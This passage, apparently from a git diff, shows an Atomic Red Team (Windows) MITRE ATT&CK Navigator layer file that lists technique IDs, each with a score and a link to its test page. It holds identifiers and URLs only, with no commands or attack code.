blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/
atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1
021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comme
nt":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"co
mment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"tec
hniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T119
7","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/r